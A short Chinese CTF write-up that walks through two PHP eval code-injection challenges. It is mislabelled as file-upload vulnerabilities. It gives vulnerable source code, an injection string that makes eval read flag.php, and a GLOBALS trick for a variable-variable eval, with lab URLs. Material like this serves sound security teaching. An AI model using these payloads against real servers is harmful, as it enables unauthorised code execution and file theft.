典型的文件上傳漏洞


案例一
URL:http://120.24.86.145:8003/
代碼

<?php 
include "waf.php"; 
include "flag.php"; 
$a = @$_REQUEST['hello']; 
eval( "var_dump($a);"); 
show_source(__FILE__); ?>

其實就是拼接eval
可構造如下語句:

1);print_r(file(flag.php));//

到了代碼里就是

eval( "var_dump(1);print_r(file(flag.php));//);"); 

案例二

URL:http://120.24.86.145:8004/index1.php

 

flag In the variable ! <?php  


error_reporting(0);// 關閉php錯誤顯示
include "flag1.php";// 引入flag1.php文件代碼
highlight_file(__file__);
if(isset($_GET['args'])){// 通過get方式傳遞 args變量才能執行if里面的代碼
    $args = $_GET['args'];
    if(!preg_match("/^\w+$/",$args)){// 這個正則表達式的意思是匹配任意 [A-Za-z0-9_] 的字符,就是任意大小寫字母和0到9以及下划線組成
        die("args error!");
    }
    eval("var_dump($$args);");// 這邊告訴我們這題是代碼審計的題目
}
?>

 

這個可以注意一下eval很明顯$$.首先他說如果不符合那個正則就die。\w的意思是所有的字母。也就是說$args必須要是字母才行。倘若是GLOBALS到eval就是eval("var_dump($GLOBALS);");


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM